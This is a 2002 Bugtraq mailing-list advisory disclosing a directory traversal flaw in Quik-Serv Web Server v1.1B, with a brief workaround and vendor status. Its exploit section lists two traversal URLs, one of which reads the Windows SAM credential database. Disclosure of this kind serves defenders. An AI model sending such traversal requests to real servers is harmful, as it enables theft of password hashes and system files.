Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Quik-Serv Web Server v1.1B Arbitrary File Disclosure
From: "a b" <p0pt4rtz () hotmail com>
Date: Wed, 03 Apr 2002 13:20:44 -0800
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Quik-Serv Web Server v1.1B Arbitrary File Disclosure

Abstract:
Quik-Serv Web Server is a small webserver with CGI implemented into
it. The server is vulnerable to a directory transversal which allows
a remote user to display arbitrary files.

Exploit:
To display the SAM database
http://server/../../../winnt/repair/sam

To display the win.ini file
http://server/../../../winnt/win.ini

Workaround:
Install packet filtering systems, wait for a fix, or don't even use
the product.

Vendor Status:
The vendor has been contacted. But received no reply.
- - - - - --
p0p t4rtz
p0pt4rtz () hotmail com
NetCra$h Security Research Team
http://www26.brinkster.com/netcrash/

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPKtxlnZQKziJjiRfEQJ5tACgx8vvxarS1zSVcWTYIvmLlQRtNi4AoNiU
xJfaNBOzgvm5Z+F582bJ9LJr
=hCYD
-----END PGP SIGNATURE-----


_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx

  By Date           By Thread  

Current thread:
  • Quik-Serv Web Server v1.1B Arbitrary File Disclosure a b (Apr 03)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]